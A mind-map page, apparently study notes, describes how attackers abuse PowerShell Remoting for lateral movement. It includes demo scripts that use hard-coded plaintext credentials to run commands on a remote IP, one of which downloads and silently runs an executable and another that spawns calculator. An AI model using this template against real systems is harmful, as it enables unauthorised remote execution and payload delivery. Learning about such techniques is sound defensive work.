Please enable JavaScript.
Coggle requires JavaScript to display documents.
Powershell Remoting - Coggle Diagram
Powershell Remoting
-
-
-
Abuse method by Attacker
What it is?
After gaining access to one system in a network, moves sideways to other systems to expand their control, gather sensitive data, or find higher-value targets like administrator accounts.
-
-
-
Demo Script
$ip = "10.108.201.118"
$pass = ConvertTo-SecureString "1nt3rn-b+!#" -AsPlainText -Force
$user = "intern-b"
$cred = New-Object System.Management.Automation.PSCredential($user, $pass)
$scriptBlock = {
$url = "https://dl.google.com/chrome/install/latest/chrome_installer.exe"
$outputPath = "$env:TEMP\chrome_installer.exe"
Invoke-WebRequest -Uri $url -OutFile $outputPath
Start-Process -FilePath $outputPath -ArgumentList "/silent", "/install" -Wait
}
Invoke-Command -ComputerName $ip -Credential $cred -ScriptBlock $scriptBlock
Spawn Calculator
$ip = "10.108.201.118"
$pass = ConvertTo-SecureString "**" -AsPlainText -Force
$user = "intern-b"
$cred = New-Object System.Management.Automation.PSCredential($user, $pass)
$scriptBlock = {
cmd /c calc.exe
}
Invoke-Command -ComputerName $ip -Credential $cred -ScriptBlock $scriptBlock
-
Overview
A way to access remote machines across a network, and run PowerShell commands on them.
-